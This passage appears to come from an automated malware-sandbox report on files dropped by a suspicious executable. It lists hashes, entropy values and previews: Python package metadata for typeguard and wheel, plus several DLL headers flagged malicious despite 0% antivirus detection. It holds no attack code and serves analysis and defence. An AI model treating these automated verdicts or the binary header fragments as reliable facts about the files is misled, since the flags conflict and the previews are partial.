                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y.P.=n>.=n>.=n>...?.?n>...;.1n>...:.5n>...=.9n>...:.>n>...:.<n>.4...-n>...?.(n>.=n?.wo>...6..n>...>.<n>.....<n>...<.<n>.Rich=n>.................PE..d...],.c.........." ...!............|...............................................4=....`..........................................?..L@..,...|........{...P..D......../.......E...T...............................S..@...............@............................text...h........................... ..`.rdata..0...........................@..@.data...............................@....pdata..D....P......................@..@.rsrc....{.......|..................@..@.reloc...E.......F...H..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1130
                                                                                                                                                                                                                              Entropy (8bit):5.118590213496374
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:qt4rWHvH0yPP3Gt6Hw1hP9QHmsUv48OV/+dho3BoqxFB:/S/lPvKhlQHms5QK3WmFB
                                                                                                                                                                                                                              MD5:F0E423EEA5C91E7AA21BDB70184B3E53
                                                                                                                                                                                                                              SHA1:A51CCDCB7A9D8C2116D1DFC16F11B3C8A5830F67
                                                                                                                                                                                                                              SHA-256:6163F7987DFB38D6BC320CE2B70B2F02B862BC41126516D552EF1CD43247E758
                                                                                                                                                                                                                              SHA-512:8BE742880E6E8495C7EC4C9ECC8F076A9FC9D64FC84B3AEBBC8D2D10DC62AC2C5053F33B716212DCB76C886A9C51619F262C460FC4B39A335CE1AE2C9A8769A8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:This is the MIT license: http://www.opensource.org/licenses/mit-license.php..Copyright (c) Alex Gr.nholm..Permission is hereby granted, free of charge, to any person obtaining a copy of this.software and associated documentation files (the "Software"), to deal in the Software.without restriction, including without limitation the rights to use, copy, modify, merge,.publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons.to whom the Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all copies or.substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,.INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR.PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE.FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF C
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3717
                                                                                                                                                                                                                              Entropy (8bit):4.986068381037722
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:DSQRbraktjaAckH94jQnJIK04Fak/grjspC3EklAJj:/Rakd4jA7ak/gvspNWmj
                                                                                                                                                                                                                              MD5:B6DAAC02F66AC8403E9061881322BABE
                                                                                                                                                                                                                              SHA1:9A94672CCFEA06156A5F8A321CD0626CFD233AE8
                                                                                                                                                                                                                              SHA-256:CF675C1C0A744F08580855390DE87CC77D676B312582E8D4CFDB5BB8FD298D21
                                                                                                                                                                                                                              SHA-512:9C6B7326C90396AA9E962C2731A1085EDB672B5696F95F552D13350843C09A246E0BBF0EC484862DFF434FA5A86DE4C0B7C963958ADE35A066B9D2384076DD47
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: typeguard.Version: 4.3.0.Summary: Run-time type checker for Python.Author-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.License: MIT.Project-URL: Documentation, https://typeguard.readthedocs.io/en/latest/.Project-URL: Change log, https://typeguard.readthedocs.io/en/latest/versionhistory.html.Project-URL: Source code, https://github.com/agronholm/typeguard.Project-URL: Issue tracker, https://github.com/agronholm/typeguard/issues.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Python: >=3.8.Description-Content
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2402
                                                                                                                                                                                                                              Entropy (8bit):5.729208478282605
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:eDnuX3DVED9HDDeDfPDLkAosGDlDiVoBFj7XH0H3HuwVB6Kgfkx7J/Q1NK1cQyxk:eyX3WRHDiLPjksV7I47J/Q1U6Qyx5fsJ
                                                                                                                                                                                                                              MD5:D680B2881597974ACD91750E5AB61010
                                                                                                                                                                                                                              SHA1:E00ED2416B5CE21641E3946905504D62D536972F
                                                                                                                                                                                                                              SHA-256:48A51959582478352275428CEECD78EF77D79AC9DAE796E39A2EAF2540282552
                                                                                                                                                                                                                              SHA-512:112172ACB515B0712AC58D78898EB159580ADA3DD3F16AABB37CB7A8D964F9E4BADF2869A245927B83B208D56904831C0F04ED925C95DFCB705801734FB0C7BA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:typeguard-4.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..typeguard-4.3.0.dist-info/LICENSE,sha256=YWP3mH37ONa8MgzitwsvArhivEESZRbVUu8c1DJH51g,1130..typeguard-4.3.0.dist-info/METADATA,sha256=z2dcHAp0TwhYCFU5Deh8x31nazElgujUz9tbuP0pjSE,3717..typeguard-4.3.0.dist-info/RECORD,,..typeguard-4.3.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..typeguard-4.3.0.dist-info/entry_points.txt,sha256=qp7NQ1aLtiSgMQqo6gWlfGpy0IIXzoMJmeQTLpzqFZQ,48..typeguard-4.3.0.dist-info/top_level.txt,sha256=4z28AhuDodwRS_c1J_l8H51t5QuwfTseskYzlxp6grs,10..typeguard/__init__.py,sha256=Onh4w38elPCjtlcU3JY9k3h70NjsxXIkAflmQn-Z0FY,2071..typeguard/__pycache__/__init__.cpython-312.pyc,,..typeguard/__pycache__/_checkers.cpython-312.pyc,,..typeguard/__pycache__/_config.cpython-312.pyc,,..typeguard/__pycache__/_decorators.cpython-312.pyc,,..typeguard/__pycache__/_exceptions.cpython-312.pyc,,..typeguard/__pycache__/_functions.cpython-312.pyc,,..typeguard/__pycache__/_i
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):48
                                                                                                                                                                                                                              Entropy (8bit):4.155187698990101
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:mWSJCQEjMitjHfLvn:mrMJHfbn
                                                                                                                                                                                                                              MD5:AEAB5BCF8BF89A51C97C4CDF70578848
                                                                                                                                                                                                                              SHA1:2E9C1617560AB66431AAB90700DB901985293485
                                                                                                                                                                                                                              SHA-256:AA9ECD43568BB624A0310AA8EA05A57C6A72D08217CE830999E4132E9CEA1594
                                                                                                                                                                                                                              SHA-512:2BE73E99296DF26A28835F91DD8BC50EB104AF06A3C54666175FAF322E0AD4620453DB0388531C4113B052A92C1D2E4C3088E25AF43CDE42AA852CF7B0CB5B05
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:[pytest11].typeguard = typeguard._pytest_plugin.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10
                                                                                                                                                                                                                              Entropy (8bit):3.321928094887362
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:LEJn:M
                                                                                                                                                                                                                              MD5:004A2A8CE1AB120A63902A27D76BD964
                                                                                                                                                                                                                              SHA1:A4E367AB40410598DADD1FC5F680ED7A176BEB09
                                                                                                                                                                                                                              SHA-256:E33DBC021B83A1DC114BF73527F97C1F9D6DE50BB07D3B1EB24633971A7A82BB
                                                                                                                                                                                                                              SHA-512:0D8FF9A43897AB390AB41AFE5BAC8BD38A68C2BEF88E844E5B49BF70E3164B226975CC2717AE3DC3428D1CFBB0BE068C243F104915FEE1FFA58C23FBE76FDB89
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:typeguard.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1138456
                                                                                                                                                                                                                              Entropy (8bit):5.461877321211646
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:FrEHdcM6hb/CjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfcAa1:FrEXaCjfk7bPNfv42BN6yzUAa1
                                                                                                                                                                                                                              MD5:B848E259FABAF32B4B3C980A0A12488D
                                                                                                                                                                                                                              SHA1:DA2E864E18521C86C7D8968DB74BB2B28E4C23E2
                                                                                                                                                                                                                              SHA-256:C65073B65F107E471C9BE3C699FB11F774E9A07581F41229582F7B2154B6FC3C
                                                                                                                                                                                                                              SHA-512:4C6953504D1401FE0C74435BCEEBC5EC7BF8991FD42B659867A3529CEE5CC64DA54F1AB404E88160E747887A7409098F1A85A546BC40F12F0DDE0025408F9E27
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#.}.#.}.#.}.*..%.}..*|.!.}..*~. .}..*y.+.}..*x...}.6-|. .}.h.|.!.}.#.|.s.}.6-p.".}.6-}.".}.6-..".}.6-..".}.Rich#.}.........PE..d....f.........." ...(.@..........0*.......................................p......]M....`.........................................p...X............P.......@.......0.../...`......P^..T............................]..@............P..p............................text...!>.......@.................. ..`.rdata..\....P.......D..............@..@.data........ ......................@....pdata.......@......................@..@.rsrc........P.......$..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1107
                                                                                                                                                                                                                              Entropy (8bit):5.115074330424529
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:PWmrRONJHLH0cPP3gtkHw1h39QHOsUv4eOk4/+jvho3nPz:ttONJbbvE/NQHOs5eNS3n7
                                                                                                                                                                                                                              MD5:7FFB0DB04527CFE380E4F2726BD05EBF
                                                                                                                                                                                                                              SHA1:5B39C45A91A556E5F1599604F1799E4027FA0E60
                                                                                                                                                                                                                              SHA-256:30C23618679108F3E8EA1D2A658C7CA417BDFC891C98EF1A89FA4FF0C9828654
                                                                                                                                                                                                                              SHA-512:205F284F3A7E8E696C70ED7B856EE98C1671C68893F0952EEC40915A383BC452B99899BDC401F9FE161A1BF9B6E2CEA3BCD90615EEE9173301657A2CE4BAFE14
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MIT License..Copyright (c) 2012 Daniel Holth <dholth@fastmail.fm> and contributors..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERW
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2153
                                                                                                                                                                                                                              Entropy (8bit):5.088249746074878
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:DEhpFu5MktjaywDK48d+md+7uT8RfkD1UKd+mOl1Awry:DEhpiMktjayq/7kOfsUzmbYy
                                                                                                                                                                                                                              MD5:EBEA27DA14E3F453119DC72D84343E8C
                                                                                                                                                                                                                              SHA1:7CEB6DBE498B69ABF4087637C6F500742FF7E2B4
                                                                                                                                                                                                                              SHA-256:59BAC22B00A59D3E5608A56B8CF8EFC43831A36B72792EE4389C9CD4669C7841
                                                                                                                                                                                                                              SHA-512:A41593939B9325D40CB67FD3F41CD1C9E9978F162487FB469094C41440B5F48016B9A66BE2E6E4A0406D6EEDB25CE4F5A860BA1E3DC924B81F63CEEE3AE31117
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: wheel.Version: 0.43.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project-URL: Changelog, https://wheel.readthedocs.io/en/s
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4557
                                                                                                                                                                                                                              Entropy (8bit):5.714200636114494
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:QXVuEmegx01TQIvFCiq9H/H7vp88FxTXiJPkGJP4CWweXQHmnDpMI78IegK5EeZR:QXVxAbYkU4CWweXQHmnDpMeV2BvTRqQF
                                                                                                                                                                                                                              MD5:44D352C4997560C7BFB82D9360F5985A
                                                                                                                                                                                                                              SHA1:BE58C7B8AB32790384E4E4F20865C4A88414B67A
                                                                                                                                                                                                                              SHA-256:783E654742611AF88CD9F00BF01A431A219DB536556E63FF981C7BD673070AC9
                                                                                                                                                                                                                              SHA-512:281B1D939A560E6A08D0606E5E8CE15F086B4B45738AB41ED6B5821968DC8D764CD6B25DB6BA562A07018C271ABF17A6BC5A380FAD05696ADF1D11EE2C5749C8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:../../bin/wheel,sha256=cT2EHbrv-J-UyUXu26cDY-0I7RgcruysJeHFanT1Xfo,249..wheel-0.43.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.43.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.43.0.dist-info/METADATA,sha256=WbrCKwClnT5WCKVrjPjvxDgxo2tyeS7kOJyc1GaceEE,2153..wheel-0.43.0.dist-info/RECORD,,..wheel-0.43.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.43.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.43.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=D6jhH00eMzbgrXGAeOwVfD5i-lCAMMycuG1L0useDlo,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-312.pyc,,..wheel/__pycache__/__main__.cpython-312.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-312.pyc,,..wheel/__pycache__/bdist_wheel.cpython-312.pyc,,..wheel/__pycache
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                              Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                              MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                              SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                              SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                              SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):104
                                                                                                                                                                                                                              Entropy (8bit):4.271713330022269
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1SSAnAYgh+MWTMhk6WjrAM5t5ln:1Jb9WTMhk9jUM5t5ln
                                                                                                                                                                                                                              MD5:6180E17C30BAE5B30DB371793FCE0085
                                                                                                                                                                                                                              SHA1:E3A12C421562A77D90A13D8539A3A0F4D3228359
                                                                                                                                                                                                                              SHA-256:AD363505B90F1E1906326E10DC5D29233241CD6DA4331A06D68AE27DFBC6740D
                                                                                                                                                                                                                              SHA-512:69EAE7B1E181D7BA1D3E2864D31E1320625A375E76D3B2FBF8856B3B6515936ACE3138D4D442CABDE7576FCFBCBB0DEED054D90B95CFA1C99829DB12A9031E26
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:[console_scripts].wheel=wheel.cli:main..[distutils.commands].bdist_wheel=wheel.bdist_wheel:bdist_wheel..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):217088
                                                                                                                                                                                                                              Entropy (8bit):5.933475371060306
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:tWLvun+3wdpugco/89ClzK0UPI7Txi9jv19DkRHzM2HOlomD:ALWn+gdpugcok9C9OPI7gGzM+N
                                                                                                                                                                                                                              MD5:4EE5CFB68E56A5BA61248AE92C60E8C0
                                                                                                                                                                                                                              SHA1:50F064A2CB91284130F99637D2756AC07AF85B01
                                                                                                                                                                                                                              SHA-256:E3698280FF0C7769C1CDACF302688735CF4AB632989E1312D2A45747E79F5DF2
                                                                                                                                                                                                                              SHA-512:B173C595A8F7D66000AE5BF88ABC7D411A5AF01C5AC2EF73A162199F2F77404654A7F08A9E3E2F3319F5002459CBCB953311641AF525F627E077EBEB7240DC4F
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{e..............b.......o.......o.......o.......o......fo.......q..........k...fo......fo......fo......Rich............PE..d... ..d.........." .........r...... .....................................................`............................................d...T........`..\.... ..h:...........p.......L..T............................M..8............................................text............................... ..`.rdata..............................@..@.data...p?.......:..................@....pdata..h:... ...<..................@..@.rsrc...\....`.......D..............@..@.reloc.......p.......H..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):34816
                                                                                                                                                                                                                              Entropy (8bit):5.607776737873708
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:qTtWWcU+d47NgCuVuA7dBm7BZ1CHrWBGwm3ReuuR+F1igomqhPGZGQvD3+VC5pEa:qM47+YedBm0WBgIuuGigahAF7+m2Ca
                                                                                                                                                                                                                              MD5:1580EE4142FB1F90F00B9F5A3CA297EB
                                                                                                                                                                                                                              SHA1:BC730100B6E8C85F709BCFB4FD7A81FB91ABF7D1
                                                                                                                                                                                                                              SHA-256:BD3F16AFB19AF91B016AB3E9669CD845F70F7A4B7A2489A81F312F060B1FB020
                                                                                                                                                                                                                              SHA-512:692C4A0595B715B14A53B41DD192AFB3058A85530975C0CAC673F3D70A2AA31FA66762FC7F453739B35971559F33E6CB20C62FC13C79796E43FF14A8728A26A1
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d.wKd.wKd.wKm..Kb.wK6.vJ`.wKp.vJf.wK6.rJh.wK6.sJl.wK6.tJg.wK..vJa.wKd.vK<.wK..~Je.wK..wJe.wK..uJe.wKRichd.wK........PE..d......d.........." .....D...@.......@....................................................`.........................................@...P...............\............................p..T............................p..8............`...............................text....C.......D.................. ..`.rdata..X,...`.......H..............@..@.data...x............v..............@....pdata...............z..............@..@.rsrc...\...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):146712
                                                                                                                                                                                                                              Entropy (8bit):6.609302620823316
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:7qLKjJj3yg1shVjm4OvfqnKAh2mrohmR5JHDbuNy:7qGEgSefI3roCDbV
                                                                                                                                                                                                                              MD5:4FADEDA3C1DA95337B67D15C282D49D8
                                                                                                                                                                                                                              SHA1:F49EE3256F8F5746515194114F7EF73D6B6141C0
                                                                                                                                                                                                                              SHA-256:28484BCEA1E387C4A41564AF8F62C040FE203FE2491E415CE90F3D7F5C7AB013
                                                                                                                                                                                                                              SHA-512:45634CAF9D9214F0E45E11A1539D8663B45527E1AE9282558B5FDB8465D90B0FABCF4C0E508504427A597BA390C029BC12068AC17D842FD0FCBB1886D252C6B1
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
